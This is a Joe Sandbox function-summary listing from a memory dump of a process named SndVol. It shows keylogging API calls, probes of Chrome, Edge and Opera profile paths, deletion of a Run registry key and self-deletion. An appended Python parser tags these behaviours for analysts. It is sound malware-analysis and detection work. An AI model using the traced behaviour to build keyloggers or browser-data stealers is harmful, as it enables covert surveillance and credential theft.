                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • CloseHandle.KERNEL32(?), ref: 2913B0EF
                                                                        • UnhookWindowsHookEx.USER32 ref: 2913B102
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                        • String ID: Online Keylogger Stopped
                                                                        • API String ID: 1623830855-1496645233
                                                                        • Opcode ID: 198b96e2550d4414c5291f34ace0c7e98a9da5f4c876bfecf39b6cb23d88b210
                                                                        • Instruction ID: 0a60f42363c33172cfe3a5dfa3e3ebe3f405f08fd51fa4537cce68b72cd786ed
                                                                        • Opcode Fuzzy Hash: 198b96e2550d4414c5291f34ace0c7e98a9da5f4c876bfecf39b6cb23d88b210
                                                                        • Instruction Fuzzy Hash: 65012434B002407BE7257B36DC0A7BEBBB19F52218FC0145DC84202195FB612B5BC7DA
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: $G
                                                                        • API String ID: 269201875-4251033865
                                                                        • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                                        • Instruction ID: 483ea3cb8e69554956f25a4eebe374b55c73d2bea4a71fdca42660505d2a7063
                                                                        • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                                        • Instruction Fuzzy Hash: C3E0E522A0655001FFB1663F7D0466B01478BC12BEB00032BE62B876C0DF607542946B
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 2913C594
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                        • API String ID: 1174141254-2800177040
                                                                        • Opcode ID: 4a39a5281aecd0c1eedec495c3444bac523214345d7f3a3b2c90ad756ed398a4
                                                                        • Instruction ID: ddc7238f23babb5d5dcba90219bbaeb5104d1acd1085bcffbfe25b905a958e8d
                                                                        • Opcode Fuzzy Hash: 4a39a5281aecd0c1eedec495c3444bac523214345d7f3a3b2c90ad756ed398a4
                                                                        • Instruction Fuzzy Hash: 63F0E231A04209B6DB04FAF7DC468EE7F3C9F20299BC01026AA06520C4EE14AB4782E8
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 2913C5F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                        • API String ID: 1174141254-1629609700
                                                                        • Opcode ID: a5a46b2b1b0686a9fa908cf3489378ba9bff2946627dfbfa3e5b3793ce9f85b4
                                                                        • Instruction ID: 477d6979cad541b3e539f9fc302a896587839e21af1fdc239ceecfa79951789d
                                                                        • Opcode Fuzzy Hash: a5a46b2b1b0686a9fa908cf3489378ba9bff2946627dfbfa3e5b3793ce9f85b4
                                                                        • Instruction Fuzzy Hash: EDF0E931904219B69B04E6F7CC468EE7B3C9F30199FC09015A90652184EE14AB47C2E8
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 2913C531
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                        • API String ID: 1174141254-4188645398
                                                                        • Opcode ID: 93600cf66746ab31a58999ed0b5d875cac6bb13c6cb62948a6f922efbad2a609
                                                                        • Instruction ID: 1693471093a531e77e90c2421b6d2186199d511daf04a3465b45ec206a160e68
                                                                        • Opcode Fuzzy Hash: 93600cf66746ab31a58999ed0b5d875cac6bb13c6cb62948a6f922efbad2a609
                                                                        • Instruction Fuzzy Hash: 32F08931A04119B6D754E7F7DC468EE7B3C9F20199BC05125AA0692184EE14EB4782E9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: $G
                                                                        • API String ID: 269201875-4251033865
                                                                        • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                        • Instruction ID: 76dc2f10fedd691a1e2bbf024f172df88e6dbb081550355db428f3040be16e6c
                                                                        • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                        • Instruction Fuzzy Hash: 76E0E522A0641101FE75263A3D0079B06478BC137EF20036BF627871D1EF646582906F
                                                                        APIs
                                                                        • GetKeyState.USER32(00000011), ref: 2913B686
                                                                          • Part of subcall function 2913A41B: GetForegroundWindow.USER32(?,?,00000000), ref: 2913A451
                                                                          • Part of subcall function 2913A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 2913A45D
                                                                          • Part of subcall function 2913A41B: GetKeyboardLayout.USER32(00000000), ref: 2913A464
                                                                          • Part of subcall function 2913A41B: GetKeyState.USER32(00000010), ref: 2913A46E
                                                                          • Part of subcall function 2913A41B: GetKeyboardState.USER32(?,?,00000000), ref: 2913A479
                                                                          • Part of subcall function 2913A41B: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A49C
                                                                          • Part of subcall function 2913A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 2913A4FC
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                        • String ID: [AltL]$[AltR]
                                                                        • API String ID: 2738857842-2658077756
                                                                        • Opcode ID: 2ed7027207d82eafa7599d79e3e2ea6d649af79a03b04bfdb0ebcf5aae9b0df6
                                                                        • Instruction ID: 1f96a1da8f1c184f0c1acdc6c484a5ef20a57695a06879ba18292ac1db03e3d1
                                                                        • Opcode Fuzzy Hash: 2ed7027207d82eafa7599d79e3e2ea6d649af79a03b04bfdb0ebcf5aae9b0df6
                                                                        • Instruction Fuzzy Hash: D1E09B61B4015027C989363F5D69AFD3D718F415E8BC2814DE4438B6DAE956CB4343DE
                                                                        APIs
                                                                        • GetKeyState.USER32(00000012), ref: 2913B6E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                        • API String ID: 1649606143-2446555240
                                                                        • Opcode ID: 3363624a069bbaf7dd0f2b2cde7c863402560b542455789dd311af099bf20a97
                                                                        • Instruction ID: a3cb96c69afde7c82496a8751a4660234e3229318676eb0a575a60036eebc3e2
                                                                        • Opcode Fuzzy Hash: 3363624a069bbaf7dd0f2b2cde7c863402560b542455789dd311af099bf20a97
                                                                        • Instruction Fuzzy Hash: 97E0CD31B4026027D5583A7F9A1E7BD3932DB426ACFC1011DE4834B5CBE946870353EA
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,2913D17F,00000000,291A52D8,291A52F0,?,pth_unenc), ref: 29143A6C
                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 29143A80
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 29143A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                        • API String ID: 2654517830-1051519024
                                                                        • Opcode ID: 8e3383d8448e4b3c28f1c0e2c69a851a3430a27d1347f2e41103fd111b35e46e
                                                                        • Instruction ID: 00f6a72691b426e5a269611b4a6c9eb1197b9623631e6fc5d59878b11daf5473
                                                                        • Opcode Fuzzy Hash: 8e3383d8448e4b3c28f1c0e2c69a851a3430a27d1347f2e41103fd111b35e46e
                                                                        • Instruction Fuzzy Hash: 54E0CD3165420CBBEF015E73DD06FFA7B2CEB01B40F100254B60592041C727CA055660
                                                                        APIs
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        • __Init_thread_footer.LIBCMT ref: 04431C81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 1881088180-2015055088
                                                                        • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                        • Instruction ID: f8b2f9951fcfb7a043c5b22946a704dd875667a8043c427dc416fe949ea64ecb
                                                                        • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                        • Instruction Fuzzy Hash: D1E0D835114920AFEE14B72D968095537969B0EB2AB21412BE404D62DACF2674418D5C
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8B1
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteDirectoryFileRemove
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3325800564-4028850238
                                                                        • Opcode ID: d13528a48e0892d4b7994e437fff5b1e349cc195a1cd8bfd32da02c29d87ccbd
                                                                        • Instruction ID: 71a31854f897fc2259d959daba7de8aebf38da73b00c07946d24ae1b21b9fdab
                                                                        • Opcode Fuzzy Hash: d13528a48e0892d4b7994e437fff5b1e349cc195a1cd8bfd32da02c29d87ccbd
                                                                        • Instruction Fuzzy Hash: DEE0CD315506105BE758BB32CC98BDB33BC7F14119F40551AD493D3110DF24AA4FE754
                                                                        APIs
                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1872346434-4028850238
                                                                        • Opcode ID: 8a2b4e9457d3bf5d863117506c726c46c74ee2caca16189c447f5fe82d6e1fd2
                                                                        • Instruction ID: 8ce6faf11229e2916bbaa553c6d64d01911b48aedc677bca7d3ffa271fb8ba43
                                                                        • Opcode Fuzzy Hash: 8a2b4e9457d3bf5d863117506c726c46c74ee2caca16189c447f5fe82d6e1fd2
                                                                        • Instruction Fuzzy Hash: 8ED0C93435929AABE7392A62ED48B443E5BA705321F200601B821512EAD72D4854EA10
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,29131D55), ref: 29170D77
                                                                        • GetLastError.KERNEL32 ref: 29170D85
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 29170DE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1717984340-0
                                                                        • Opcode ID: e3cf2ef771cde21f6b4f01180ed30c318c5623612f2e7f6b774637bdf65b3409
                                                                        • Instruction ID: 5c9ce253d1c022bf517e2f90e2f5d50a90ca4246be812e84a2affafb1bfff647
                                                                        • Opcode Fuzzy Hash: e3cf2ef771cde21f6b4f01180ed30c318c5623612f2e7f6b774637bdf65b3409
                                                                        • Instruction Fuzzy Hash: 3E41C331A04347AFDB158F66CD44BEE7BB5EF01368F2181A9F9589B2A1DB709B02C750
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 29141BC7
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 29141C93
                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29141CB5
                                                                        • SetLastError.KERNEL32(0000007E,29141F2B), ref: 29141CCC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastRead
                                                                        • String ID:
                                                                        • API String ID: 4100373531-0
                                                                        • Opcode ID: c27b2709a0a370e49ce6956799f56edf8dec054576f0c4843a4810418487ca73
                                                                        • Instruction ID: 7f0c7e5707cc56b13cae8f4d199ab9e9f54d202a0607a30873a725f4a4cda14a
                                                                        • Opcode Fuzzy Hash: c27b2709a0a370e49ce6956799f56edf8dec054576f0c4843a4810418487ca73
                                                                        • Instruction Fuzzy Hash: 1441CE71A443059FE7148F16DCC4BA6B3E8FF58718F00182DEA6AE7651EB31EA06CB11
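The function summaries above are machine-generated, and the behaviour they document is spread across many near-identical blocks: a keystroke reader (GetKeyState, GetKeyboardState, ToUnicodeEx with modifier tags such as [AltL]/[CtrlR]), a RegOpenKeyExW/RegDeleteValueW pair on HKLM (0x80000002) Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, a DeleteFileW/RemoveDirectoryW cleanup, TerminateProcess, and an IsBadReadPtr walker that sets the Win32 errors 0x7E (ERROR_MOD_NOT_FOUND) and 0x7F (ERROR_PROC_NOT_FOUND) by hand, which is the signature of a hand-rolled import resolver (the 0x14-byte probe matches sizeof(IMAGE_IMPORT_DESCRIPTOR)). The parser below is an added example, not Joe Sandbox code: it splits such a listing into per-function records and tags each with the behaviour its API set implies. The sample input is constructed from lines copied out of this listing; the tag names and rules are this example's own.

```python
"""Parse Joe Sandbox function-summary blocks and tag the behaviour they show.

Added example (not Joe Sandbox's own tooling). The tag rules are assumptions
chosen to match the API combinations seen in the listing above.
"""
import re

# Constructed sample input: summary lines copied from the listing above
# (bullets kept as extracted), covering five of the functions shown.
SAMPLE_REPORT = r"""
APIs
  • Part of subcall function 2913A41B: GetKeyState.USER32(00000010), ref: 2913A46E
  • Part of subcall function 2913A41B: GetKeyboardState.USER32(?,?,00000000), ref: 2913A479
  • Part of subcall function 2913A41B: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A49C
Strings
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
• String ID: [AltL]$[AltR]
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,2913D17F,00000000,291A52D8,291A52F0,?,pth_unenc), ref: 29143A6C
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 29143A80
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8DC
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
• String ID: pth_unenc
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 29141BC7
• SetLastError.KERNEL32(0000007F,?,?,?), ref: 29141CB5
• SetLastError.KERNEL32(0000007E,29141F2B), ref: 29141CCC
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
• String ID:
"""

# "• [Part of subcall function X: ]Name.Module(args), ref: ADDR"; the parens
# are optional because lines such as "GetLastError.KERNEL32 ref: ..." omit them.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-F]+)")
STR_RE = re.compile(r"String ID:\s*(?P<ids>.*)$")
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")

# winerror.h values the resolver writes with SetLastError.
ERROR_MOD_NOT_FOUND = 0x7E
ERROR_PROC_NOT_FOUND = 0x7F
# Registry autostart paths worth flagging (lower-cased substrings).
PERSISTENCE_KEYS = ("currentversion\\run", "currentversion\\policies\\explorer\\run")


def parse_blocks(text):
    """Split a function listing into dicts: apis, strings, source, offset."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":                      # each function starts here
            cur = {"apis": [], "strings": [], "source": None, "offset": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                "ref": m["ref"], "parent": m["parent"]})
            continue
        m = SRC_RE.search(line)
        if m:
            cur["source"], cur["offset"] = m["file"], m["offset"]
            continue
        m = STR_RE.search(line)
        if m:                                            # "$" separates string IDs
            cur["strings"] = [s for s in m["ids"].split("$") if s]
    return blocks


def hex_args(api):
    """Numeric view of an API's arguments; '?' and string args become None."""
    return [int(a, 16) if HEX_RE.fullmatch(a) else None for a in api["args"]]


def classify(block):
    """Return the set of behaviour tags implied by one function's API calls."""
    names = {a["name"] for a in block["apis"]}
    tags = set()
    modifier_tags = any(s.startswith("[") and s.endswith("]") for s in block["strings"])
    if ("ToUnicodeEx" in names and names & {"GetKeyState", "GetKeyboardState"}) or (
            "GetKeyState" in names and modifier_tags):
        tags.add("keylogger")
    for api in block["apis"]:
        blob = ",".join(api["args"]).lower()
        if api["name"].startswith("Reg") and any(k in blob for k in PERSISTENCE_KEYS):
            tags.add("run-key-delete" if "RegDeleteValueW" in names else "run-key-access")
        if api["name"] == "SetLastError" and hex_args(api)[:1] and \
                hex_args(api)[0] in (ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND) and \
                "IsBadReadPtr" in names:
            tags.add("manual-import-resolution")
    if {"DeleteFileW", "RemoveDirectoryW"} <= names:
        tags.add("self-delete")
    if "TerminateProcess" in names:
        tags.add("process-kill")
    return tags


def summarize(text):
    """Map each tag to the sorted call-site addresses of the functions carrying it."""
    found = {}
    for block in parse_blocks(text):
        refs = sorted({a["ref"] for a in block["apis"]})
        for tag in classify(block):
            found.setdefault(tag, []).extend(refs)
    return found


if __name__ == "__main__":
    for tag, refs in sorted(summarize(SAMPLE_REPORT).items()):
        print(f"{tag:26s} {' '.join(refs)}")
```

Feed the full listing through summarize() and the per-function noise collapses to a handful of tags with the addresses to pivot on in the dump at offset 29130000. The rules are deliberately conservative: a lone GetKeyState with no ToUnicodeEx and no bracketed modifier strings is not called a keylogger, and the import-resolver tag needs both the pointer probe and the hand-set error codes, since either alone is common in benign loader code.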